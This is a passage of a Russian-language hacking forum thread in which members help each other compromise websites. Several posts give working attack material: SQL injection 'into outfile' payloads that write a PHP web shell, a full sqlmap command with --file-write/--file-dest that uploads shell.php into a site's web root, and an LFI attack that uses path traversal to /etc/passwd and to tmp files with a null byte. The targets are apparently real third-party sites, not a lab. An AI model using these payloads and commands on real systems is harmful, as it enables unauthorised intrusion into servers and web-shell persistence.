HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 15.09.2013, 01:19
m00c0w
Участник форума
Регистрация: 25.12.2011
Сообщений: 103
Провел на форуме:
36927

Репутация: 5
По умолчанию

база на том же сервере? файлы читать можешь? Прочитай хотябы тот файл где ошибку показывает. Ну или конфиг апач\нжнкс \ етк посомтри, или hosts

Если все ок, ищи диру под запись.
 
Ответить с цитированием

  #12  
Старый 15.09.2013, 02:41
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от m00c0w  
база на том же сервере? файлы читать можешь? Прочитай хотябы тот файл где ошибку показывает. Ну или конфиг апач\нжнкс \ етк посомтри, или hosts
Если все ок, ищи диру под запись.
Файлы читаются. Файл с ошибкой читается.
 
Ответить с цитированием

  #13  
Старый 15.09.2013, 03:25
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

Цитата:
Сообщение от RWD  
Ну вот пытаюсь залить через sqlmap командой --file-write="C:\путь\тут php файл " --file-dest="путь"
--file-write="C:\путь\тут php файл "

Что за путь здесь нужно указывать?

--file-dest="путь" здесь я так понял путь к файлам сайта
 
Ответить с цитированием

  #14  
Старый 15.09.2013, 04:31
m00c0w
Участник форума
Регистрация: 25.12.2011
Сообщений: 103
Провел на форуме:
36927

Репутация: 5
По умолчанию

Цитата:
Сообщение от RWD  
Файлы читаются. Файл с ошибкой читается.
Ручками залей уже

vuln=1 limit 1 into outfile '/PathToShell/filename.php' lines terminated by ""--+

или

vuln=1 limit 1 into outfile ''/PathToShell/filename.php' fields terminated by '' optionally enclosed by ""--+​

2 Sat-hacker

вобщемта тут и понимать нечего -hh опция все покажет.

--file-write=WFILE Write a local file on the back-end DBMS file system

--file-dest=DFILE Back-end DBMS absolute filepath to write to
 
Ответить с цитированием

  #15  
Старый 15.09.2013, 18:34
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
Провел на форуме:
182660

Репутация: 324


По умолчанию

решил попробовать заюзать lfi найденный не так давно на неком сайте

оказалось что картинки подгрузить нельзя а другими путями я ниразу не ходил

есть доступ к phpinfo и php.ini

подскажите хороший мануал =(
 
Ответить с цитированием

  #16  
Старый 15.09.2013, 19:06
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

Цитата:
Сообщение от psihoz26  
решил попробовать заюзать lfi найденный не так давно на неком сайте
оказалось что картинки подгрузить нельзя а другими путями я ниразу не ходил
есть доступ к phpinfo и php.ini
подскажите хороший мануал =(
Классика https://rdot.org/forum/showthread.ph...hlight=phpinfo
 
Ответить с цитированием

  #17  
Старый 15.09.2013, 19:37
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
Провел на форуме:
182660

Репутация: 324


По умолчанию

заюзал скрипт и при инклуде у меня пустая страничка

perl lfi.pl httр//site.com/i.php httр://www.site.com/index.php?page=../../../../../../../../../../../../../../etc/passwd%00

как только скрипт выполняется я копирую имя файла tmp/******

и инклужу

http://www.site.com/index.php?page=../../../../../../../../../../../../../../tmp/******%00

что может быть не так?? в скрипте ничего менять не надо??
 
Ответить с цитированием

  #18  
Старый 15.09.2013, 22:15
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

Цитата:
Сообщение от m00c0w  
Ручками залей уже
vuln=1 limit 1 into outfile '/PathToShell/filename.php' lines terminated by ""--+
или
vuln=1 limit 1 into outfile ''/PathToShell/filename.php' fields terminated by '' optionally enclosed by ""--+​
2 Sat-hacker
вобщемта тут и понимать нечего -hh опция все покажет.
--file-write=WFILE Write a local file on the back-end DBMS file system
--file-dest=DFILE Back-end DBMS absolute filepath to write to
Я это читал но не могу вкурить,обьясните если можна
 
Ответить с цитированием

  #19  
Старый 17.09.2013, 01:09
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от Sat-hacker  
Я это читал но не могу вкурить,обьясните если можна
В sqlmap --file-write="C:\shell.php" sqlmap берет шелл куда ты его положил на своем жд, --file-dest="/var/www/html/site.com" это куда sqlmap будет копировать файл шелла на сервере, при условии что есть права на запись файла.

К примеру так.

python sqlmap.py -u "http://dcsdcsdcds.com/index.php?id=12

--random-agent --file-write="C:\sqlmap\shell.php" --file-dest="var/www/html/dcsdcsdcds.com/images/"
 
Ответить с цитированием

  #20  
Старый 17.09.2013, 03:08
m00c0w
Участник форума
Регистрация: 25.12.2011
Сообщений: 103
Провел на форуме:
36927

Репутация: 5
По умолчанию

товарищи, кто нибудь использует сокращение команд? -z. Удобно же.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.